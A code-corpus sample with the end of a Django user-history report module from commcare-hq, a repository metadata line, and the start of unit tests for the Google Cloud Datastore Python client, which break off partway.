'corehq.apps.reports.filters.users.UserPropertyFilter',
'corehq.apps.reports.filters.users.UserUploadRecordFilter',
]
description = ugettext_lazy("History of user updates")
ajax_pagination = True
default_sort = {'changed_at': 'desc'}
@classmethod
def get_primary_properties(cls, domain):
"""
Get slugs and human-friendly names for the properties that are available
for filtering and/or displayed by default in the report, without
needing to click "See More".
"""
if domain_has_privilege(domain, privileges.APP_USER_PROFILES):
user_data_label = _("profile or user data")
else:
user_data_label = _("user data")
return {
"username": _("username"),
ROLE_FIELD: _("role"),
"email": _("email"),
DOMAIN_FIELD: _("project"),
"is_active": _("is active"),
"language": _("language"),
PHONE_NUMBERS_FIELD: _("phone numbers"),
LOCATION_FIELD: _("primary location"),
"user_data": user_data_label,
TWO_FACTOR_FIELD: _("two factor authentication disabled"),
ASSIGNED_LOCATIONS_FIELD: _("assigned locations"),
}
@property
def headers(self):
h = [
DataTablesColumn(_("Affected User"), sortable=False),
DataTablesColumn(_("Modified by User"), sortable=False),
DataTablesColumn(_("Action"), prop_name='action'),
DataTablesColumn(_("Via"), prop_name='changed_via'),
DataTablesColumn(_("Changes"), sortable=False),
DataTablesColumn(_("Change Message"), sortable=False),
DataTablesColumn(_("Timestamp"), prop_name='changed_at'),
]
return DataTablesHeader(*h)
@property
def total_records(self):
return self._get_queryset().count()
@memoized
def _get_queryset(self):
user_slugs = self.request.GET.getlist(EMWF.slug)
user_ids = self._get_user_ids(user_slugs)
# return empty queryset if no matching users were found
if user_slugs and not user_ids:
return UserHistory.objects.none()
changed_by_user_slugs = self.request.GET.getlist(ChangedByUserFilter.slug)
changed_by_user_ids = self._get_user_ids(changed_by_user_slugs)
# return empty queryset if no matching users were found
if changed_by_user_slugs and not changed_by_user_ids:
return UserHistory.objects.none()
user_property = self.request.GET.get('user_property')
actions = self.request.GET.getlist('action')
user_upload_record_id = self.request.GET.get('user_upload_record')
query = self._build_query(user_ids, changed_by_user_ids, user_property, actions, user_upload_record_id)
return query
def _get_user_ids(self, slugs):
es_query = self._get_users_es_query(slugs)
return es_query.values_list('_id', flat=True)
def _get_users_es_query(self, slugs):
return EnterpriseUserFilter.user_es_query(
self.domain,
slugs,
self.request.couch_user,
)
def _build_query(self, user_ids, changed_by_user_ids, user_property, actions, user_upload_record_id):
filters = Q(for_domain__in=self._for_domains())
if user_ids:
filters = filters & Q(user_id__in=user_ids)
if changed_by_user_ids:
filters = filters & Q(changed_by__in=changed_by_user_ids)
if user_property:
filters = filters & self._get_property_filters(user_property)
if actions and ChangeActionFilter.ALL not in actions:
filters = filters & Q(action__in=actions)
if user_upload_record_id:
filters = filters & Q(user_upload_record_id=user_upload_record_id)
if self.datespan:
filters = filters & Q(changed_at__lt=self.datespan.enddate_adjusted,
changed_at__gte=self.datespan.startdate)
return UserHistory.objects.filter(filters)
def _for_domains(self):
return BillingAccount.get_account_by_domain(self.domain).get_domains()
@staticmethod
def _get_property_filters(user_property):
if user_property in CHANGE_MESSAGES_FIELDS:
query_filters = Q(change_messages__has_key=user_property)
# to include CommCareUser creation from UI where a location can be assigned as a part of user creation
# which is tracked only under "changes" and not "change messages"
if user_property == LOCATION_FIELD:
query_filters = query_filters | Q(changes__has_key='location_id')
else:
query_filters = Q(changes__has_key=user_property)
return query_filters
@property
def rows(self):
records = self._get_queryset().order_by(self.ordering)[
self.pagination.start:self.pagination.start + self.pagination.count
]
for record in records:
yield self._user_history_row(record, self.domain, self.timezone)
@property
def ordering(self):
by, direction = list(self.get_sorting_block()[0].items())[0]
return '-' + by if direction == 'desc' else by
@memoized
def _get_location_name(self, location_id):
from corehq.apps.locations.models import SQLLocation
if not location_id:
return None
try:
location_object = SQLLocation.objects.get(location_id=location_id)
except ObjectDoesNotExist:
return None
return location_object.display_name
def _user_history_row(self, record, domain, timezone):
return [
record.user_repr,
record.changed_by_repr,
_get_action_display(record.action),
record.changed_via,
self._user_history_details_cell(record.changes, domain),
self._html_list(list(get_messages(record.change_messages))),
ServerTime(record.changed_at).user_time(timezone).ui_string(USER_DATETIME_FORMAT),
]
def _html_list(self, changes):
items = []
if isinstance(changes, dict):
for key, value in changes.items():
if isinstance(value, dict):
value = self._html_list(value)
elif isinstance(value, list):
value = format_html(", ".join(value))
else:
value = format_html(str(value))
items.append("<li>{}: {}</li>".format(key, value))
elif isinstance(changes, list):
items = ["<li>{}</li>".format(format_html(change)) for change in changes]
return mark_safe(f"<ul class='list-unstyled'>{''.join(items)}</ul>")
def _user_history_details_cell(self, changes, domain):
properties = UserHistoryReport.get_primary_properties(domain)
properties.pop("user_data", None)
primary_changes = {}
all_changes = {}
for key, value in changes.items():
if key == 'location_id':
value = self._get_location_name(value)
primary_changes[properties[LOCATION_FIELD]] = value
all_changes[properties[LOCATION_FIELD]] = value
elif key == 'user_data':
for user_data_key, user_data_value in changes['user_data'].items():
all_changes[f"user data: {user_data_key}"] = user_data_value
elif key in properties:
primary_changes[properties[key]] = value
all_changes[properties[key]] = value
more_count = len(all_changes) - len(primary_changes)
return render_to_string("reports/standard/partials/user_history_changes.html", {
"primary_changes": self._html_list(primary_changes),
"all_changes": self._html_list(all_changes),
"more_count": more_count,
})
def _get_action_display(logged_action):
action = ugettext_lazy("Updated")
if logged_action == UserHistory.CREATE:
action = ugettext_lazy("Added")
elif logged_action == UserHistory.DELETE:
action = ugettext_lazy("Deleted")
return action
|
dimagi/commcare-hq
|
corehq/apps/reports/standard/users/reports.py
|
Python
|
bsd-3-clause
| 10,221
| 0.00137
|
# Copyright 2014 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import mock
def _make_credentials():
import google.auth.credentials
return mock.Mock(spec=google.auth.credentials.Credentials)
def _make_entity_pb(project, kind, integer_id, name=None, str_val=None):
from google.cloud.datastore_v1.proto import entity_pb2
from google.cloud.datastore.helpers import _new_value_pb
entity_pb = entity_pb2.Entity()
entity_pb.key.partition_id.project_id = project
path_element = entity_pb.key.path.add()
path_element.kind = kind
path_element.id = integer_id
if name is not None and str_val is not None:
value_pb = _new_value_pb(entity_pb, name)
value_pb.string_value = str_val
return entity_pb
class Test__get_gcd_project(unittest.TestCase):
def _call_fut(self):
from google.cloud.datastore.client import _get_gcd_project
return _get_gcd_project()
def test_no_value(self):
environ = {}
with mock.patch("os.getenv", new=environ.get):
project = self._call_fut()
self.assertIsNone(project)
def test_value_set(self):
from google.cloud.datastore.client import GCD_DATASET
MOCK_PROJECT = object()
environ = {GCD_DATASET: MOCK_PROJECT}
with mock.patch("os.getenv", new=environ.get):
project = self._call_fut()
self.assertEqual(project, MOCK_PROJECT)
class Test__determine_default_project(unittest.TestCase):
def _call_fut(self, project=None):
from google.cloud.datastore.client import _determine_default_project
return _determine_default_project(project=project)
def _determine_default_helper(self, gcd=None, fallback=None, project_called=None):
_callers = []
def gcd_mock():
_callers.append("gcd_mock")
return gcd
def fallback_mock(project=None):
_callers.append(("fallback_mock", project))
return fallback
patch = mock.patch.multiple(
"google.cloud.datastore.client",
_get_gcd_project=gcd_mock,
_base_default_project=fallback_mock,
)
with patch:
returned_project = self._call_fut(project_called)
return returned_project, _callers
def test_no_value(self):
project, callers = self._determine_default_helper()
self.assertIsNone(project)
self.assertEqual(callers, ["gcd_mock", ("fallback_mock", None)])
def test_explicit(self):
PROJECT = object()
project, callers = self._determine_default_helper(project_called=PROJECT)
self.assertEqual(project, PROJECT)
self.assertEqual(callers, [])
def test_gcd(self):
PROJECT = object()
project, callers = self._determine_default_helper(gcd=PROJECT)
self.assertEqual(project, PROJECT)
self.assertEqual(callers, ["gcd_mock"])
def test_fallback(self):
PROJECT = object()
project, callers = self._determine_default_helper(fallback=PROJECT)
self.assertEqual(project, PROJECT)
self.assertEqual(callers, ["gcd_mock", ("fallback_mock", None)])
class TestClient(unittest.TestCase):
PROJECT = "PROJECT"
@staticmethod
def _get_target_class():
from google.cloud.datastore.client import Client
return Client
def _make_one(
self,
project=PROJECT,
namespace=None,
credentials=None,
client_info=None,
client_options=None,
_http=None,
_use_grpc=None,
):
return self._get_target_class()(
project=project,
namespace=namespace,
credentials=credentials,
client_info=client_info,
client_options=client_options,
_http=_http,
_use_grpc=_use_grpc,
)
def test_constructor_w_project_no_environ(self):
# Some environments (e.g. AppVeyor CI) run in GCE, so
# this test would fail artificially.
patch = mock.patch(
"google.cloud.datastore.client._base_default_project", return_value=None
)
with patch:
self.assertRaises(EnvironmentError, self._make_one, None)
def test_constructor_w_implicit_inputs(self):
from google.cloud.datastore.client import _CLIENT_INFO
from google.cloud.datastore.client import _DATASTORE_BASE_URL
other = "other"
creds = _make_credentials()
klass = self._get_target_class()
patch1 = mock.patch(
"google.cloud.datastore.client._determine_default_project",
return_value=other,
)
patch2 = mock.patch("google.auth.default", return_value=(creds, None))
with patch1 as _determine_default_project:
with patch2 as default:
client = klass()
self.assertEqual(client.project, other)
self.assertIsNone(client.namespace)
self.assertIs(client._credentials, creds)
self.assertIs(client._client_info, _CLIENT_INFO)
self.assertIsNone(client._http_internal)
self.assertIsNone(client._client_options)
self.assertEqual(client.base_url, _DATASTORE_BASE_URL)
self.assertIsNone(client.current_batch)
self.assertIsNone(client.current_transaction)
default.assert_called_once_with()
_determine_default_project.assert_called_once_with(None)
def test_constructor_w_explicit_inputs(self):
from google.api_core.client_options import ClientOptions
other = "other"
namespace = "namespace"
creds = _make_credentials()
client_info = mock.Mock()
client_options = ClientOptions("endpoint")
http = object()
client = self._make_one(
project=other,
namespace=namespace,
credentials=creds,
client_info=client_info,
client_options=client_options,
_http=http,
)
self.assertEqual(client.project, other)
self.assertEqual(client.namespace, namespace)
self.assertIs(client._credentials, creds)
self.assertIs(client._client_info, client_info)
self.assertIs(client._http_internal, http)
self.assertIsNone(client.current_batch)
self.assertIs(client._base_url, "endpoint")
self.assertEqual(list(client._batch_stack), [])
def test_constructor_use_grpc_default(self):
import google.cloud.datastore.client as MUT
project = "PROJECT"
creds = _make_credentials()
http = object()
with mock.patch.object(MUT, "_USE_GRPC", new=True):
client1 = self._make_one(project=project, credentials=creds, _http=http)
self.assertTrue(client1._use_grpc)
# Explicitly over-ride the environment.
client2 = self._make_one(
project=project, credentials=creds, _http=http, _use_grpc=False
)
self.assertFalse(client2._use_grpc)
with mock.patch.object(MUT, "_USE_GRPC", new=False):
client3 = self._make_one(project=project, credentials=creds, _http=http)
self.assertFalse(client3._use_grpc)
# Explicitly over-ride the environment.
client4 = self._make_one(
project=project, credentials=creds, _http=http, _use_grpc=True
)
self.assertTrue(client4._use_grpc)
def test_constructor_gcd_host(self):
from google.cloud.environment_vars import GCD_HOST
host = "localhost:1234"
fake_environ = {GCD_HOST: host}
project = "PROJECT"
creds = _make_credentials()
http = object()
with mock.patch("os.environ", new=fake_environ):
client = self._make_one(project=project, credentials=creds, _http=http)
self.assertEqual(client.base_url, "http://" + host)
def test_base_url_property(self):
from google.cloud.datastore.client import _DATASTORE_BASE_URL
from google.api_core.client_options import ClientOptions
alternate_url = "https://alias.example.com/"
project = "PROJECT"
creds = _make_credentials()
http = object()
client_options = ClientOptions()
client = self._make_one(
project=project,
credentials=creds,
_http=http,
client_options=client_options,
)
self.assertEqual(client.base_url, _DATASTORE_BASE_URL)
client.base_url = alternate_url
self.assertEqual(client.base_url, alternate_url)
def test_base_url_property_w_client_options(self):
alternate_url = "https://alias.example.com/"
project = "PROJECT"
creds = _make_credentials()
http = object()
client_options = {"api_endpoint": "endpoint"}
client = self._make_one(
project=project,
credentials=creds,
_http=http,
client_options=client_options,
)
self.assertEqual(client.base_url, "endpoint")
client.base_url = alternate_url
self.assertEqual(client.base_url, alternate_url)
def test__datastore_api_property_already_set(self):
client = self._make_one(
project="prahj-ekt", credentials=_make_credentials(), _use_grpc=True
)
already = client._datastore_api_internal = object()
self.assertIs(client._datastore_api, already)
def test__datastore_api_property_gapic(self):
client_info = mock.Mock()
client = self._make_one(
project="prahj-ekt",
credentials=_make_credentials(),
client_info=client_info,
_http=object(),
_use_grpc=True,
)
self.assertIsNone(client._datastore_api_internal)
patch = mock.patch(
"google.cloud.datastore.client.make_datastore_api",
return_value=mock.sentinel.ds_api,
)
with patch as make_api:
ds_api = client._datastore_api
self.assertIs(ds_api, mock.sentinel.ds_api)
self.assertIs(client._datastore_api_internal, mock.sentinel.ds_api)
make_api.assert_called_once_with(client)
def test__datastore_api_property_http(self):
client_info = mock.Mock()
client = self._make_one(
project="prahj-ekt",
credentials=_make_credentials(),
client_info=client_info,
_http=object(),
_use_grpc=False,
)
self.assertIsNone(client._datastore_api_internal)
patch = mock.patch(
"google.cloud.datastore.client.HTTPDatastoreAPI",
return_value=mock.sentinel.ds_api,
)
with patch as make_api:
ds_api = client._datastore_api
self.assertIs(ds_api, mock.sentinel.ds_api)
self.assertIs(client._datastore_api_internal, mock.sentinel.ds_api)
make_api.assert_called_once_with(client)
def test__push_batch_and__pop_batch(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
batch = client.batch()
xact = client.transaction()
client._push_batch(batch)
self.assertEqual(list(client._batch_stack), [batch])
self.assertIs(client.current_batch, batch)
self.assertIsNone(client.current_transaction)
client._push_batch(xact)
self.assertIs(client.current_batch, xact)
self.assertIs(client.current_transaction, xact)
# list(_LocalStack) returns in reverse order.
self.assertEqual(list(client._batch_stack), [xact, batch])
self.assertIs(client._pop_batch(), xact)
self.assertEqual(list(client._batch_stack), [batch])
self.assertIs(client._pop_batch(), batch)
self.assertEqual(list(client._batch_stack), [])
def test_get_miss(self):
_called_with = []
def _get_multi(*args, **kw):
_called_with.append((args, kw))
return []
creds = _make_credentials()
client = self._make_one(credentials=creds)
client.get_multi = _get_multi
key = object()
self.assertIsNone(client.get(key))
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]["keys"], [key])
self.assertIsNone(_called_with[0][1]["missing"])
self.assertIsNone(_called_with[0][1]["deferred"])
self.assertIsNone(_called_with[0][1]["transaction"])
def test_get_hit(self):
TXN_ID = "123"
_called_with = []
_entity = object()
def _get_multi(*args, **kw):
_called_with.append((args, kw))
return [_entity]
creds = _make_credentials()
client = self._make_one(credentials=creds)
client.get_multi = _get_multi
key, missing, deferred = object(), [], []
self.assertIs(client.get(key, missing, deferred, TXN_ID), _entity)
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]["keys"], [key])
self.assertIs(_called_with[0][1]["missing"], missing)
self.assertIs(_called_with[0][1]["deferred"], deferred)
self.assertEqual(_called_with[0][1]["transaction"], TXN_ID)
def test_get_multi_no_keys(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
results = client.get_multi([])
self.assertEqual(results, [])
def test_get_multi_miss(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.key import Key
creds = _make_credentials()
client = self._make_one(credentials=creds)
ds_api = _make_datastore_api()
client._datastore_api_internal = ds_api
key = Key("Kind", 1234, project=self.PROJECT)
results = client.get_multi([key])
self.assertEqual(results, [])
read_options = datastore_pb2.ReadOptions()
ds_api.lookup.assert_called_once_with(
self.PROJECT, [key.to_protobuf()], read_options=read_options
)
def test_get_multi_miss_w_missing(self):
from google.cloud.datastore_v1.proto import entity_pb2
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.key import Key
KIND = "Kind"
ID = 1234
# Make a missing entity pb to be returned from mock backend.
missed = entity_pb2.Entity()
missed.key.partition_id.project_id = self.PROJECT
path_element = missed.key.path.add()
path_element.kind = KIND
path_element.id = ID
creds = _make_credentials()
client = self._make_one(credentials=creds)
# Set missing entity on mock connection.
lookup_response = _make_lookup_response(missing=[missed])
ds_api = _make_datastore_api(lookup_response=lookup_response)
client._datastore_api_internal = ds_api
key = Key(KIND, ID, project=self.PROJECT)
missing = []
entities = client.get_multi([key], missing=missing)
self.assertEqual(entities, [])
key_pb = key.to_protobuf()
self.assertEqual([missed.key.to_protobuf() for missed in missing], [key_pb])
read_options = datastore_pb2.ReadOptions()
ds_api.lookup.assert_called_once_with(
self.PROJECT, [key_pb], read_options=read_options
)
def test_get_multi_w_missing_non_empty(self):
from google.cloud.datastore.key import Key
creds = _make_credentials()
client = self._make_one(credentials=creds)
key = Key("Kind", 1234, project=self.PROJECT)
missing = ["this", "list", "is", "not", "empty"]
self.assertRaises(ValueError, client.get_multi, [key], missing=missing)
def test_get_multi_w_deferred_non_empty(self):
from google.cloud.datastore.key import Key
creds = _make_credentials()
client = self._make_one(credentials=creds)
key = Key("Kind", 1234, project=self.PROJECT)
deferred = ["this", "list", "is", "not", "empty"]
self.assertRaises(ValueError, client.get_multi, [key], deferred=deferred)
def test_get_multi_miss_w_deferred(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.key import Key
key = Key("Kind", 1234, project=self.PROJECT)
key_pb = key.to_protobuf()
# Set deferred entity on mock connection.
creds = _make_credentials()
client = self._make_one(credentials=creds)
lookup_response = _make_lookup_response(deferred=[key_pb])
ds_api = _make_datastore_api(lookup_response=lookup_response)
client._datastore_api_internal = ds_api
deferred = []
entities = client.get_multi([key], deferred=deferred)
self.assertEqual(entities, [])
self.assertEqual([def_key.to_protobuf() for def_key in deferred], [key_pb])
read_options = datastore_pb2.ReadOptions()
ds_api.lookup.assert_called_once_with(
self.PROJECT, [key_pb], read_options=read_options
)
def test_get_multi_w_deferred_from_backend_but_not_passed(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore_v1.proto import entity_pb2
from google.cloud.datastore.entity import Entity
from google.cloud.datastore.key import Key
key1 = Key("Kind", project=self.PROJECT)
key1_pb = key1.to_protobuf()
key2 = Key("Kind", 2345, project=self.PROJECT)
key2_pb = key2.to_protobuf()
entity1_pb = entity_pb2.Entity()
entity1_pb.key.CopyFrom(key1_pb)
entity2_pb = entity_pb2.Entity()
entity2_pb.key.CopyFrom(key2_pb)
creds = _make_credentials()
client = self._make_one(credentials=creds)
# Mock up two separate requests. Using an iterable as side_effect
# allows multiple return values.
lookup_response1 = _make_lookup_response(
results=[entity1_pb], deferred=[key2_pb]
)
lookup_response2 = _make_lookup_response(results=[entity2_pb])
ds_api = _make_datastore_api()
ds_api.lookup = mock.Mock(
side_effect=[lookup_response1, lookup_response2], spec=[]
)
client._datastore_api_internal = ds_api
missing = []
found = client.get_multi([key1, key2], missing=missing)
self.assertEqual(len(found), 2)
self.assertEqual(len(missing), 0)
# Check the actual contents on the response.
self.assertIsInstance(found[0], Entity)
self.assertEqual(found[0].key.path, key1.path)
self.assertEqual(found[0].key.project, key1.project)
self.assertIsInstance(found[1], Entity)
self.assertEqual(found[1].key.path, key2.path)
self.assertEqual(found[1].key.project, key2.project)
self.assertEqual(ds_api.lookup.call_count, 2)
read_options = datastore_pb2.ReadOptions()
ds_api.lookup.assert_any_call(
self.PROJECT, [key2_pb], read_options=read_options
)
ds_api.lookup.assert_any_call(
self.PROJECT, [key1_pb, key2_pb], read_options=read_options
)
def test_get_multi_hit(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.key import Key
kind = "Kind"
id_ = 1234
path = [{"kind": kind, "id": id_}]
# Make a found entity pb to be returned from mock backend.
entity_pb = _make_entity_pb(self.PROJECT, kind, id_, "foo", "Foo")
# Make a connection to return the entity pb.
creds = _make_credentials()
client = self._make_one(credentials=creds)
lookup_response = _make_lookup_response(results=[entity_pb])
ds_api = _make_datastore_api(lookup_response=lookup_response)
client._datastore_api_internal = ds_api
key = Key(kind, id_, project=self.PROJECT)
result, = client.get_multi([key])
new_key = result.key
# Check the returned value is as expected.
self.assertIsNot(new_key, key)
self.assertEqual(new_key.project, self.PROJECT)
self.assertEqual(new_key.path, path)
self.assertEqual(list(result), ["foo"])
self.assertEqual(result["foo"], "Foo")
read_options = datastore_pb2.ReadOptions()
ds_api.lookup.assert_called_once_with(
self.PROJECT, [key.to_protobuf()], read_options=read_options
)
def test_get_multi_hit_w_transaction(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.key import Key
txn_id = b"123"
kind = "Kind"
id_ = 1234
path = [{"kind": kind, "id": id_}]
# Make a found entity pb to be returned from mock backend.
entity_pb = _make_entity_pb(self.PROJECT, kind, id_, "foo", "Foo")
# Make a connection to return the entity pb.
creds = _make_credentials()
client = self._make_one(credentials=creds)
lookup_response = _make_lookup_response(results=[entity_pb])
ds_api = _make_datastore_api(lookup_response=lookup_response)
client._datastore_api_internal = ds_api
key = Key(kind, id_, project=self.PROJECT)
txn = client.transaction()
txn._id = txn_id
result, = client.get_multi([key], transaction=txn)
new_key = result.key
# Check the returned value is as expected.
self.assertIsNot(new_key, key)
self.assertEqual(new_key.project, self.PROJECT)
self.assertEqual(new_key.path, path)
self.assertEqual(list(result), ["foo"])
self.assertEqual(result["foo"], "Foo")
read_options = datastore_pb2.ReadOptions(transaction=txn_id)
ds_api.lookup.assert_called_once_with(
self.PROJECT, [key.to_protobuf()], read_options=read_options
)
def test_get_multi_hit_multiple_keys_same_project(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.key import Key
kind = "Kind"
id1 = 1234
id2 = 2345
# Make a found entity pb to be returned from mock backend.
entity_pb1 = _make_entity_pb(self.PROJECT, kind, id1)
entity_pb2 = _make_entity_pb(self.PROJECT, kind, id2)
# Make a connection to return the entity pbs.
creds = _make_credentials()
client = self._make_one(credentials=creds)
lookup_response = _make_lookup_response(results=[entity_pb1, entity_pb2])
ds_api = _make_datastore_api(lookup_response=lookup_response)
client._datastore_api_internal = ds_api
key1 = Key(kind, id1, project=self.PROJECT)
key2 = Key(kind, id2, project=self.PROJECT)
retrieved1, retrieved2 = client.get_multi([key1, key2])
# Check values match.
self.assertEqual(retrieved1.key.path, key1.path)
self.assertEqual(dict(retrieved1), {})
self.assertEqual(retrieved2.key.path, key2.path)
self.assertEqual(dict(retrieved2), {})
read_options = datastore_pb2.ReadOptions()
ds_api.lookup.assert_called_once_with(
self.PROJECT,
[key1.to_protobuf(), key2.to_protobuf()],
read_options=read_options,
)
def test_get_multi_hit_multiple_keys_different_project(self):
from google.cloud.datastore.key import Key
PROJECT1 = "PROJECT"
PROJECT2 = "PROJECT-ALT"
# Make sure our IDs are actually different.
self.assertNotEqual(PROJECT1, PROJECT2)
key1 = Key("KIND", 1234, project=PROJECT1)
key2 = Key("KIND", 1234, project=PROJECT2)
creds = _make_credentials()
client = self._make_one(credentials=creds)
with self.assertRaises(ValueError):
client.get_multi([key1, key2])
def test_get_multi_max_loops(self):
from google.cloud.datastore.key import Key
kind = "Kind"
id_ = 1234
# Make a found entity pb to be returned from mock backend.
entity_pb = _make_entity_pb(self.PROJECT, kind, id_, "foo", "Foo")
# Make a connection to return the entity pb.
creds = _make_credentials()
client = self._make_one(credentials=creds)
lookup_response = _make_lookup_response(results=[entity_pb])
ds_api = _make_datastore_api(lookup_response=lookup_response)
client._datastore_api_internal = ds_api
key = Key(kind, id_, project=self.PROJECT)
deferred = []
missing = []
patch = mock.patch("google.cloud.datastore.client._MAX_LOOPS", new=-1)
with patch:
result = client.get_multi([key], missing=missing, deferred=deferred)
# Make sure we have no results, even though the connection has been
# set up as in `test_hit` to return a single result.
self.assertEqual(result, [])
self.assertEqual(missing, [])
self.assertEqual(deferred, [])
ds_api.lookup.assert_not_called()
def test_put(self):
_called_with = []
def _put_multi(*args, **kw):
_called_with.append((args, kw))
creds = _make_credentials()
client = self._make_one(credentials=creds)
client.put_multi = _put_multi
entity = object()
client.put(entity)
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]["entities"], [entity])
def test_put_multi_no_entities(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
self.assertIsNone(client.put_multi([]))
def test_put_multi_w_single_empty_entity(self):
# https://github.com/GoogleCloudPlatform/google-cloud-python/issues/649
from google.cloud.datastore.entity import Entity
creds = _make_credentials()
client = self._make_one(credentials=creds)
self.assertRaises(ValueError, client.put_multi, Entity())
def test_put_multi_no_batch_w_partial_key(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.helpers import _property_tuples
entity = _Entity(foo=u"bar")
key = entity.key = _Key(self.PROJECT)
key._id = None
creds = _make_credentials()
client = self._make_one(credentials=creds)
key_pb = _make_key(234)
ds_api = _make_datastore_api(key_pb)
client._datastore_api_internal = ds_api
result = client.put_multi([entity])
self.assertIsNone(result)
self.assertEqual(ds_api.commit.call_count, 1)
_, positional, keyword = ds_api.commit.mock_calls[0]
self.assertEqual(keyword, {"transaction": None})
self.assertEqual(len(positional), 3)
self.assertEqual(positional[0], self.PROJECT)
self.assertEqual(positional[1], datastore_pb2.CommitRequest.NON_TRANSACTIONAL)
mutations = positional[2]
mutated_entity = _mutated_pb(self, mutations, "insert")
self.assertEqual(mutated_entity.key, key.to_protobuf())
prop_list = list(_property_tuples(mutated_entity))
self.assertTrue(len(prop_list), 1)
name, value_pb = prop_list[0]
self.assertEqual(name, "foo")
self.assertEqual(value_pb.string_value, u"bar")
def test_put_multi_existing_batch_w_completed_key(self):
from google.cloud.datastore.helpers import _property_tuples
creds = _make_credentials()
client = self._make_one(credentials=creds)
entity = _Entity(foo=u"bar")
key = entity.key = _Key(self.PROJECT)
with _NoCommitBatch(client) as CURR_BATCH:
result = client.put_multi([entity])
self.assertIsNone(result)
mutated_entity = _mutated_pb(self, CURR_BATCH.mutations, "upsert")
self.assertEqual(mutated_entity.key, key.to_protobuf())
prop_list = list(_property_tuples(mutated_entity))
self.assertTrue(len(prop_list), 1)
name, value_pb = prop_list[0]
self.assertEqual(name, "foo")
self.assertEqual(value_pb.string_value, u"bar")
def test_delete(self):
_called_with = []
def _delete_multi(*args, **kw):
_called_with.append((args, kw))
creds = _make_credentials()
client = self._make_one(credentials=creds)
client.delete_multi = _delete_multi
key = object()
client.delete(key)
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]["keys"], [key])
def test_delete_multi_no_keys(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
client._datastore_api_internal = _make_datastore_api()
result = client.delete_multi([])
self.assertIsNone(result)
client._datastore_api_internal.commit.assert_not_called()
def test_delete_multi_no_batch(self):
from google.cloud.datastore_v1.proto import datastore_pb2
key = _Key(self.PROJECT)
creds = _make_credentials()
client = self._make_one(credentials=creds)
ds_api = _make_datastore_api()
client._datastore_api_internal = ds_api
result = client.delete_multi([key])
self.assertIsNone(result)
self.assertEqual(ds_api.commit.call_count, 1)
_, positional, keyword = ds_api.commit.mock_calls[0]
self.assertEqual(keyword, {"transaction": None})
self.assertEqual(len(positional), 3)
self.assertEqual(positional[0], self.PROJECT)
self.assertEqual(positional[1], datastore_pb2.CommitRequest.NON_TRANSACTIONAL)
mutations = positional[2]
mutated_key = _mutated_pb(self, mutations, "delete")
self.assertEqual(mutated_key, key.to_protobuf())
def test_delete_multi_w_existing_batch(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
client._datastore_api_internal = _make_datastore_api()
key = _Key(self.PROJECT)
with _NoCommitBatch(client) as CURR_BATCH:
result = client.delete_multi([key])
self.assertIsNone(result)
mutated_key = _mutated_pb(self, CURR_BATCH.mutations, "delete")
self.assertEqual(mutated_key, key._key)
client._datastore_api_internal.commit.assert_not_called()
def test_delete_multi_w_existing_transaction(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
client._datastore_api_internal = _make_datastore_api()
key = _Key(self.PROJECT)
with _NoCommitTransaction(client) as CURR_XACT:
result = client.delete_multi([key])
self.assertIsNone(result)
mutated_key = _mutated_pb(self, CURR_XACT.mutations, "delete")
self.assertEqual(mutated_key, key._key)
client._datastore_api_internal.commit.assert_not_called()
def test_allocate_ids_w_partial_key(self):
num_ids = 2
incomplete_key = _Key(self.PROJECT)
incomplete_key._id = None
creds = _make_credentials()
client = self._make_one(credentials=creds, _use_grpc=False)
allocated = mock.Mock(keys=[_KeyPB(i) for i in range(num_ids)], spec=["keys"])
alloc_ids = mock.Mock(return_value=allocated, spec=[])
ds_api = mock.Mock(allocate_ids=alloc_ids, spec=["allocate_ids"])
client._datastore_api_internal = ds_api
result = client.allocate_ids(incomplete_key, num_ids)
# Check the IDs returned.
self.assertEqual([key._id for key in result], list(range(num_ids)))
def test_allocate_ids_w_completed_key(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
complete_key = _Key(self.PROJECT)
self.assertRaises(ValueError, client.allocate_ids, complete_key, 2)
def test_reserve_ids_w_completed_key(self):
num_ids = 2
creds = _make_credentials()
client = self._make_one(credentials=creds, _use_grpc=False)
complete_key = _Key(self.PROJECT)
reserve_ids = mock.Mock()
ds_api = mock.Mock(reserve_ids=reserve_ids, spec=["reserve_ids"])
client._datastore_api_internal = ds_api
self.assertTrue(not complete_key.is_partial)
client.reserve_ids(complete_key, num_ids)
expected_keys = [complete_key.to_protobuf()] * num_ids
reserve_ids.assert_called_once_with(self.PROJECT, expected_keys)
def test_reserve_ids_w_partial_key(self):
num_ids = 2
incomplete_key = _Key(self.PROJECT)
incomplete_key._id = None
creds = _make_credentials()
client = self._make_one(credentials=creds)
with self.assertRaises(ValueError):
client.reserve_ids(incomplete_key, num_ids)
def test_reserve_ids_w_wrong_num_ids(self):
num_ids = "2"
complete_key = _Key(self.PROJECT)
creds = _make_credentials()
client = self._make_one(credentials=creds)
with self.assertRaises(ValueError):
client.reserve_ids(complete_key, num_ids)
def test_key_w_project(self):
KIND = "KIND"
ID = 1234
creds = _make_credentials()
client = self._make_one(credentials=creds)
